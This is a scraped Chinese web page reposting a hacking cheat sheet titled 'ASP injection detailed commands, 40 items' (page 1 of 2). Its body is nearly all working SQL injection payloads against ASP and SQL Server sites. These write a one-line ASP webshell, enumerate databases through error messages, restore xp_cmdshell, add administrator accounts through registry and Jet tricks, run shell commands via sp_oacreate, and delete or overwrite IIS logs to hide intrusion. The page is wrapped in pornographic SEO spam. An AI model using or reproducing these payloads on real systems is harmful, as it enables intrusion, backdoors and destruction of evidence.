好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > ASP注入詳細命令40條第1/2頁

ASP注入詳細命令40條第1/2頁

熱門標簽:電銷機器人采購 外呼系統怎么話費 滴滴地圖標注上車點 硅基電話機器人加盟 友邦互聯電銷機器人違法嗎 高質量的電銷外呼系統 地圖標注還可以做嗎 無營業執照地圖標注教學 宿州防封外呼系統平臺
1、 用^轉義字符來寫ASP(一句話木馬)文件的方法: 
 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^script language=VBScript runat=server^>execute request^("l"^)^/script^> >c:\mu.asp';--  

echo ^%execute^(request^("l"^)^)%^> >c:\mu.asp 

2、 顯示SQL系統版本:  
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)  
? http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,@@version)-- 

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'  
缺少 'End'  
/iisHelp/common/500-100.asp,行242  
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e07'  
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.  
/display.asp,行17 
3、 在檢測索尼中國的網站漏洞時,分明已經確定了漏洞存在卻無法在這三種漏洞中找到對應的類型。偶然間我想到了在SQL語言中可以使用"in"關鍵字進行查詢,例如"select * from mytable where id in(1)",括號中的值就是我們提交的數據,它的結果與使用"select * from mytable where id=1"的查詢結果完全相同。所以訪問頁面的時候在URL后面加上") and 1=1 and 1 in(1"后原來的SQL語句就變成了"select * from mytable where id in(1) and 1=1 and 1 in(1)",這樣就會出現期待已久的頁面了。暫且就叫這種類型的漏洞為"包含數字型"吧,聰明的你一定想到了還有"包含字符型"呢。對了,它就是由于類似"select * from mytable where name in('firstsee')"的查詢語句造成的。 

4、 判斷xp_cmdshell擴展存儲過程是否存在: 
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') 
恢復xp_cmdshell擴展存儲的命令: 
http://www.test.com/news/show1.asp?NewsId=125272 
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';-- 

5、 向啟動組中寫入命令行和執行程序: 
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' 


6、 查看當前的數據庫名稱: 
? http://192.168.1.5/display.asp?keyno=188 and 0>db_name(n) n改成0,1,2,3……就可以跨庫了 
? http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,db_name())-- 
Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'  
缺少 'End'  
/iisHelp/common/500-100.asp,行242  
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e07'  
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.  
/display.asp,行17  
7、 列出當前所有的數據庫名稱: 
select * from master.dbo.sysdatabases 列出所有列的記錄 
select name from master.dbo.sysdatabases 僅列出name列的記錄 

8、 不需xp_cmdshell支持在有注入漏洞的SQL服務器上運行CMD命令: 
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL) 
DECLARE @shell INT 
DECLARE @fso INT 
DECLARE @file INT 
DECLARE @isEnd BIT 
DECLARE @out VARCHAR(400) 
EXEC sp_oacreate 'wscript.shell',@shell output 
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\&;c:\temp.txt','0','true' 
--注意run的參數true指的是將等待程序運行的結果,對于類似ping的長時間命令必需使用此參數。 

EXEC sp_oacreate 'scripting.filesystemobject',@fso output 
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' 
--因為fso的opentextfile方法將返回一個textstream對象,所以此時@file是一個對象令牌 

WHILE @shell>0 
BEGIN 
EXEC sp_oamethod @file,'Readline',@out out 
insert INTO MYTMP(info) VALUES (@out) 
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out 
IF @isEnd=1 BREAK 
ELSE CONTINUE 
END 

drop TABLE MYTMP  

---------- 
DECLARE @shell INT 
DECLARE @fso INT 
DECLARE @file INT 
DECLARE @isEnd BIT 
DECLARE @out VARCHAR(400) 
EXEC sp_oacreate 'wscript.shell',@shell output 
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' 
EXEC sp_oacreate 'scripting.filesystemobject',@fso output 
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' 
WHILE @shell>0 
BEGIN 
EXEC sp_oamethod @file,'Readline',@out out 
insert INTO MYTMP(info) VALUES (@out) 
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out 
IF @isEnd=1 BREAK 
ELSE CONTINUE 
END 

以下是一行里面將WEB用戶加到管理員組中: 
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

以下是一行中執行EXE程序: 
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\&;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

SQL下三種執行CMD命令的方法: 

先刪除7.18號日志: 
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' 

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

(3)首先開啟jet沙盤模式,通過擴展存儲過程xp_regwrite修改注冊表實現,管理員修改注冊表不能預防的原因。出于安全原因,默認沙盤模式未開啟,這就是為什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER權限,為了方便,這里建議使用sysadmin權限測試: 
? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 
注: 
0 禁止一切(默認) 
1 使能訪問ACCESS,但是禁止其它 
2 禁止訪問ACCESS,但是使能其他 
3 使能一切 

? 這里僅給出sysadmin權限下使用的命令: 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 


? 建立鏈接數據庫'L0op8ack'參考命令: 
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb' 

? 如何使用鏈接數據庫: 

使用這個方式可以執行,但是很不幸,DB_OWNER權限是不夠的,需要至少sysadmin權限或者securityadmin+setupadmin權限組合 
sp_addlinkedserver需要sysadmin或setupadmin權限 
sp_addlinkedsrvlogin需要sysadmin或securityadmin權限 
最終發現,還是sa權限或者setupadmin+securityadmin權限帳戶才能使用, 
一般沒有哪個管理員這么設置普通帳戶權限的 

實用性不強,僅作為一個學習總結吧 

大致過程如下,如果不是sysadmin,那么IAS.mdb權限驗證會出錯, 
我測試的時候授予hacker這個用戶setupadmin+securityadmin權限,使用ias.mdb失敗 
需要找一個一般用戶可訪問的mdb才可以: 

? 新建鏈接服務器"L0op8ack":EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';-- 
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--或 
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';-- 
? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');-- 
? exec sp_droplinkedsrvlogin 'L0op8ack','false';-- 
? exec sp_dropserver 'L0op8ack';-- 

再考貝一個其它文件來代替7.18日文件: 
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt' 

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline', ut out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 
12下一頁閱讀全文
您可能感興趣的文章:
  • Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
  • 全面了解ASP注入方法 [收集總結]
  • 全面認識ASP注入技巧
  • 防ASP注入終極防范

標簽:儋州 雅安 宣城 江門 七臺河 新余 廣元 錫林郭勒盟

巨人網絡通訊聲明:本文標題《ASP注入詳細命令40條第1/2頁》,本文關鍵詞  ASP,注入,詳細,命令,40條第,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《ASP注入詳細命令40條第1/2頁》相關的同類信息!
  • 本頁收集關于ASP注入詳細命令40條第1/2頁的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 爷爷你的太大了我害怕| 狠狠撞击nph| 99久久久无码国产精品6| 韩国bj青草自慰无码AV| 毛片a级毛片免费播放下载| 色情性黄?片做运动视频吸乳头| 久久久WWW成人免费毛片直播| 无码性教育片在线播放的注意事项| 97午夜精品| 夹好了不许穿内裤去上课小说| 亚洲VA欧美va国产va妖精 | 无码动漫一区二区三区在线观看| 女生舔男生下面视频| BigAss?欧美大屁股| ?国产精品嫩草AV城中村| 拉丁舞跳着跳着做起来了| 好大?好爽?再深一点欧美小说| 美女被男人桶出白浆喷水| 公交车要了他| 黑人巨茎大战椎名由奈| 动漫美女裸体被?涩涩动画软件| 欧美热妇| 激情欧美日韩一区二区| 狠狠躁日日躁夜夜躁A片小说免费 777色婷婷AV一区二区三99 | 闺蜜们放荡交换H肉辣文| 一二三四视频社区5在线高清视频 菠萝视频完整播放在线观看免费 海外华人费免8x | freesexxx| 一招判断是不是仙人跳| 日韩久久一区| 成年女人免费v片| juliaann纯熟老少配| 国产黄大片在线视频| 色欲色香天天天综合网www小说| 国产高清91| 国产精品aV精品一区二区三区| 男女污污视频在线观看| 中国老妇激情xxxx| 工口里番无肉码全彩3d动态| 真浪小sao货是不是又痒痒了| 重见天日| 小黄3p详细过程全篇|